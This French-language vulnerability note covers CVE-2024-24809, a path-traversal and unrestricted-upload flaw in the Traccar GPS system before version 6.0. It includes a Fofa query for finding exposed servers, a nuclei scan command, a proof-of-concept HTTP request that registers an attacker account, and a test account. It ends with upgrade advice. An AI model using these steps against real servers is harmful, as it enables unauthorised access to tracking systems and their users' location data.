
Failles critiques dans le système GPS Traccar exposent les utilisateurs à des attaques à distance
#Description
Traccar est un système de suivi GPS open source. Les versions antérieures à 6.0 sont vulnérables au path traversal et au téléchargement sans restriction de fichiers de type dangereux.
Étant donné que le système permet l'enregistrement par défaut, les attaquants peuvent acquérir des permissions d'utilisateur ordinaire en enregistrant un compte et exploiter cette vulnérabilité pour télécharger des fichiers avec le préfixe device. dans
n'importe quel dossier. Les attaquants peuvent utiliser cette vulnérabilité pour du phishing, des attaques de cross-site scripting, et potentiellement exécuter des commandes arbitraires sur le serveur. La version 6.0 contient un correctif pour ce problème.
#Utilisation
Fofa query : app="traccar"
nuclei --target {target.com} -t CVE-2024-24809.yaml
#Preuve de concept (avec burpsuite)
POST /api/users HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
{"name": "{{name}}", "email": "{{email}}", "password": "{{password}}", "totpKey": null}
#Compte de test
name: "ghostsec"
password: "ghostsec"
email: "[email protected]"
Mettez à jour org.traccar:traccar vers la version 6.0 ou supérieure.